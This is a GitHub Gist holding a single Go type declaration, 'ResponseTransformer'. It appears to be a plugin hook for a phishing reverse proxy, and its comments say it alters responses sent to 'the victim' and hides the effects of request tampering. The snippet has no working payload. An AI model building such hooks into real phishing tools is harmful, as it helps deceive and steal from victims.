Skip to content

Instantly share code, notes, and snippets.

@JonCooperWorks
Created October 5, 2020 05:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JonCooperWorks/5b299b6ef990b878f69b99b5d289ac88 to your computer and use it in GitHub Desktop.
Save JonCooperWorks/5b299b6ef990b878f69b99b5d289ac88 to your computer and use it in GitHub Desktop.
// ResponseTransformer modifies a response before it is returned to the victim.
// You can use ResponseTransformers to hide any visible results of a RequestTransformer.
// Delays in this function will slow down the phishing site for the victim.
// Your ResponseTransformer should be a function called "ResponseTransformer"
type ResponseTransformer func(*http.Response) error
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment